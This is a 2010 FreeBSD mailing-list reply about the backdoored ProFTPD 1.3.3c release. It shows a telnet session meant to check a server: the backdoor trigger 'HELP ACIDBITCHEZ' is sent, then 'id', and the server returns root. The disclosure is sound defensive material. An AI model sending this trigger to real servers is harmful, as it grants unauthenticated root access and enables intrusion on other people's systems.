Date: Thu, 2 Dec 2010 23:49:14 +0200 From: Ivan Klymenko <fidaj@ukr.net> To: freebsd-ports@freebsd.org Subject: Re: ftp/proftpd 1.3.3c with a version which contained a backdoor. Message-ID: <20101202234914.26e53500@ukr.net> In-Reply-To: <20101202232206.66c672a1@ukr.net> References: <20101202232206.66c672a1@ukr.net>
next in thread | previous in thread | raw e-mail | index | archive | help
=D0=92 Thu, 2 Dec 2010 23:22:06 +0200 Ivan Klymenko <fidaj@ukr.net> =D0=BF=D0=B8=D1=88=D0=B5=D1=82: > Hello, people! > What do you think is it worth to pay attention to these events: > http://sourceforge.net/mailarchive/message.php?msg_name=3Dalpine.DEB.2.00= .1012011542220.12930%40familiar.castaglia.org >=20 > and that in this case needs to be done with the port ftp/proftpd > itself? >=20 > Thanks! Check vulnerability of your server, you can by using the following command sequence: $ telnet 1.2.3.4 21 Trying 1.2.3.4... Connected to 1.2.3.4 Escape character is '^]'. 220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [1.2.3.4] =20 HELP ACIDBITCHEZ =20 id ; =20 uid=3D0(root) gid=3D0(root) groups=3D0(root),65534(nogroup)
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20101202234914.26e53500>